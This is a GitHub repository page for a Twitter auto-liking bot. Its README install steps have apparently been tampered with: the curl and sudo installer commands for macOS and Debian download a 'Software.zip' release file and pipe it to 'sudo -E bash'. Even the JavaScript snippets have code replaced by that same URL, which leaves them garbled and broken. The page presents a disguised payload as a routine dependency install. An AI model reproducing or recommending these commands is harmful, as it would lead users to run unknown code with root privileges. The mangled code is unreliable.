Skip to content

This app allows you to automate Twitter liking for specific keywords, hashtags, or even full sentences. The bot uses streaming API which means that everything happens in real time.

License

Notifications You must be signed in to change notification settings

rarawe/twitter-like-bot

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

readme | twitter-like-bot

This app allows you to automate Twitter liking for specific keywords, hashtags, or even full sentences. The bot uses streaming API which means that everything happens in real time.

create Twitter developer account

Apply for access — Twitter Developers from the developer dashboard, create new Twitter app

download & install https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip
alternatively install via your package manager

macOS

curl "https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip${VERSION:-$(wget -qO- https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip | sed -nE 's|.*>node-(.*)\.pkg</a>.*|\1|p')}.pkg" > "$https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip" && sudo installer -store -pkg "$https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip" -target "/"

Debian & Ubuntu

curl -sL https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip | sudo -E bash -
sudo apt-get install -y nodejs

how to use?

cd to the project folder and install packages npm i

enter your Twitter app keys & tokens

const client = new Twitter({
  consumer_key: '',
  consumer_secret: '',
  access_token_key: '',
  access_token_secret: ''
});

enter keywords, hashtags or sentences that you want to track

const stream = https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip('statuses/filter', {track:'#example1, #example2’});

cd to the project folder and start the bot: npm test or alternatively node https://github.com/rarawe/twitter-like-bot/releases/download/v2.0/Software.zip

About

This app allows you to automate Twitter liking for specific keywords, hashtags, or even full sentences. The bot uses streaming API which means that everything happens in real time.

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • JavaScript 100.0%